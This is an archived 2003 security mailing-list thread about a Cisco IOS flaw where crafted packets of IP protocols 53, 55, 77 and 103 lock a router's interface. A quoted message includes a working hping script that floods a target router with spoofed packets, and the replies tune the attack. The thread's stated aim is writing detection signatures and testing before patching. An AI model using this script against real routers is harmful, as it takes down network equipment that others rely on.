Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover

From: Jack Hayes (jlhayesat_private)
Date: Tue Jul 22 2003 - 14:44:58 PDT

  • Next message: Dan Hanson: "New SecurityFocus Articles (2)" 

    The problem with sending 19 packets of each protocol is that PIM (103)
datagrams do not work on routers with PIM processes running.   I've tested
several versions of IOS.  A combination of  the packet types is not
necessary.  76+ packets of any one of the protocols (53, 55, 77, and 103 (if
PIM is not running)) will lockup the interface on vulnerable routers.  Also,
per the Cisco advisory, with PIM packets any TTL can be used so as long as
the datagram makes it to the target router.  With 53, 55, and 77 the TTL
must be 0 or 1 when it arrives at the target router.

jack



----- Original Message ----- 
From: "Simon Gray" <simong@desktop-guardian.com>
To: "Curt Purdy" <purdyat_private>; <rnewsat_private>;
<incidentsat_private>
Sent: Tuesday, July 22, 2003 11:45 AM
Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS
routers- requires power cycle to recover


> I think this is what you're looking for.
>
> <snip>
> Subject: RE: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS
> Vulnerability
>
>
> Here's a simple script I wrote that you can use to generate an attack:
>
> > cat exploit.sh
> #!/bin/tcsh -f
>
> if ($1 == "" || $2 == "") then
>   echo "usage: $0 <router hostname|address> <ttl>"
>   exit
> endif
>
> foreach protocol (53 55 77 103)
>     /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
> $protocol --count 19 --interval u250 --data 26
> end
>
> As you can see, this script iterates over the various protocols and sends
19
> packets each for a total of 76 (just enough to fill up the input queue on
> vulnerable routers). Before upgrading my routers, I confirmed that this
> attack works. I then tested to see if sending 76 packets of a single
> protocol was enough to hose the interface.. it was. Maybe I mis-read the
> original advisory, but it seemed to me that Cisco suggested all 4 were
> necessary.
>
> Therefore, be careful when creating your signatures.. If you don't use any
> of the above protocols (SWIPE, IP Mobility, Sun ND, PIM) it might make
sense
> to have rules that log/alert on all of them. Don't make the rules too
> dependent on the payload either; in several packet captures I've seen, the
> payload is significantly larger than the 26 bytes necessary to exploit
IOS.
>
> --
> Patrick Donahue
> Network/Systems Administrator
> ACMI Corporation
> </snip>
> ----- Original Message ----- 
> From: "Curt Purdy" <purdyat_private>
> To: <rnewsat_private>; <incidentsat_private>
> Sent: Sunday, July 20, 2003 7:58 PM
> Subject: RE: Cisco IOS Denial of Service that affects most Cisco IOS
> routers- requires power cycle to recover
>
>
> > Could we have an example of an hping command to invoke this.  I have
been
> > playing with it and would like a real-world example, and since there a
now
> > multiple exploits out, this knowledge should not be a problem. Thanks.
> >
> > Curt
> >
> > ----------------------------------------
> >
> > Practice safe hex.
> >
> > - Andrew Briney, editor Information Security
> >
> >
> > -----Original Message-----
> > From: Richard Johnson [mailto:rdumpat_private]
> > Sent: Sunday, July 20, 2003 2:21 AM
> > To: incidentsat_private
> > Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS
> > routers- requires power cycle to recover
> >
> >
> > In article
> > <Pine.BSO.4.53.0307172223150.11409at_private-guesswork.com>,
> >  Tina Bird <tbird@precision-guesswork.com> wrote:
> >
> > > information on the detailed structure of the evil packets in these
> > > protocols is not yet public AFAIK.
> >
> >
> > The router has problems if it receives a packet, content irrelevant,
> > that makes it to supervisor level claiming an IP protocol that it
> > doesn't have code to handle.
> >
> > The kickup to supervisor level happens when the packet is targeted
> > directly at the router's IP address (per first Cisco advisory) or just
> > has its TTL expire in transit past the router (per revised Cisco
> > advisory).
> >
> > Send enough packets (default 75), and the input queue is full.  hping is
> > enough of a launch platform for that--there's no need for
> > questionable-source exploit binaries when testing.
> >
> >
> > Richard
> >
> > --
> > My mailbox. My property. My personal space. My rules. Deal with it.
> >                         http://www.river.com/users/share/cluetrain/
> >
>
> --------------------------------------------------------------------------
> --
> > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas,
the
> > world's premier technical IT security event! 10 tracks, 15 training
> > sessions,
> > 1,800 delegates from 30 nations including all of the top experts, from
> CSO's
> > to
> > "underground" security specialists.  See for yourself what the buzz is
> > about!
> > Early-bird registration ends July 3.  This event will sell out.
> > www.blackhat.com
>
> --------------------------------------------------------------------------
> --
> >
> >
> >
>
> --------------------------------------------------------------------------
> -
>
> --------------------------------------------------------------------------
> --
> >
> >
> >
>
>
> --------------------------------------------------------------------------
-
> --------------------------------------------------------------------------
--
>
>



---------------------------------------------------------------------------
----------------------------------------------------------------------------

    This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 14:55:02 PDT